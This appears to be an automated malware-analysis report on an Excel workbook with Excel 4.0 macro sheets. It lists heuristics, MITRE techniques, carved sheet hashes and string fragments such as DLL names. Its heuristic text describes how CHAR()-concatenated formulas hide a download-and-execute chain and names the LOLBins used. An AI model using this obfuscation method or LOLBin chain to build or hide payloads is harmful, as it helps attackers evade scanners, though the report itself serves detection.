Verdict: MALICIOUS
Risk Score: 120
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic; T1203 Exploitation for Client Execution
The file contains Excel 4.0 macro sheets, which are known to be used for malicious purposes. The heuristic 'OOXML_XLM_REASSEMBLED_PAYLOAD' indicates that the macro sheet contains obfuscated formulas that, when reassembled, form a URL pointing to a payload. This suggests the document is designed to download and execute a secondary malicious file.
Heuristics (2)
- OOXML_XLM_MACROSHEET (critical, 1 related finding): Excel 4.0 macro sheet (3 sheets). Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks. The macro sheet is stored as XLSB/BIFF12 binary content, which many XML-only OOXML scanners miss.
- OOXML_XLM_REASSEMBLED_PAYLOAD (critical): XLM payload reassembled from CHAR()/split formulas. An Excel 4.0 macro sheet builds its payload inside the formula token stream by concatenating per-character CHAR() calls and string fragments, so no WinAPI name, shell command, or URL is ever contiguous in the .bin for a literal-bytes scan to find. Reassembling the formulas recovered download/execute API names, LOLBin commands (regsvr32/rundll32/mshta/wmic/powershell), or a payload URL — the de-obfuscated download-and-run kill chain.
Extracted artifacts (3)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| xlm_sheet_00.bin | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/intlsheet1.bin | 5827 bytes | 508ebb8d8a17285393862b61fecdeed5c080c23d0f0c6acb0ee14b69006c8270 |
| xlm_sheet_01.bin | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/intlsheet2.bin | 1178 bytes | b34c069544e61839546fe6147d50d4d57faaab7f5999396424a57010ce22ac77 |
| xlm_sheet_02.bin | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/intlsheet3.bin | 3882 bytes | b02fcdc5ad50c04571b013535f6c5281ce7e6fb4692238921aca64c643cfa115 |

Previews (first 1,000 lines of each extracted sheet, as rendered by the report): all three files are BIFF12 binary record streams, so the text rendering consists mostly of unprintable bytes and is not reproduced here.
- xlm_sheet_00.bin: no readable strings in the rendered preview (preview truncated).
- xlm_sheet_01.bin: no readable strings in the rendered preview.
- xlm_sheet_02.bin: readable UTF-16 string fragments visible in the rendered preview include `https://`, `Doc2`, `Doc3`, `Doc4`, `..\covi1.dll` and `..\covi2.dll`.